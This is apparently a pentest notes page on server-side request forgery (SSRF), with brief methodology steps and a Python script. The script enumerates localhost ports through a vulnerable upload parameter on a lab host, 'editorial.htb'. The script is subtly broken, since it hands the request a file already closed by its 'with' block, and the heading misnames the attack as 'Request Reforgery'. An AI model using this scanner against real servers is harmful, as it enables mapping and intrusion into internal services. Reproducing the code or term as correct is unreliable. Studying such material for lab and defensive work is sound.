SSRF

Server Side Request Reforgery

Methodology

Watch for any unexpected redirects, especially to internal or private IP. These can often indicate a vulnerable endpoint.

Use a listener to see if the server is initiating outbound connections.

Pay special attention to which ports are open on the localhost

If you discover that there are open ports on internal services, try querying them via the vulnerable parameter.

If the SSRF vulnerability exposes endpoints, like internal API, try querying those endpoints from the vulnerable parameter.

Enumeration

Port Scanner

Use this script to enumerate open ports on the localhost:

#!/usr/bin/python3
import requests

with open("a", 'wb') as f:
    f.write(b'')

for port in range(1, 65535):
    with open("a", 'rb') as file:
        data_post = {"bookurl": f"http://127.0.0.1:{port}"}   # Vulnerable Parameter
        data_file = {"bookfile": file}    # Mandatory Parameter
    try:
        r = requests.post("http://editorial.htb/upload-cover", files=data_file, data=data_post) # Vunerable URL
        if not r.text.strip().endswith('.jpeg'):     # Filtering response
            print(f"{port} --- {r.text}")
    except requests.RequestException as e:
        print(f"Error on port {port}: {e}")

PreviousCommand Injection NextSQLi

Last updated 11 days ago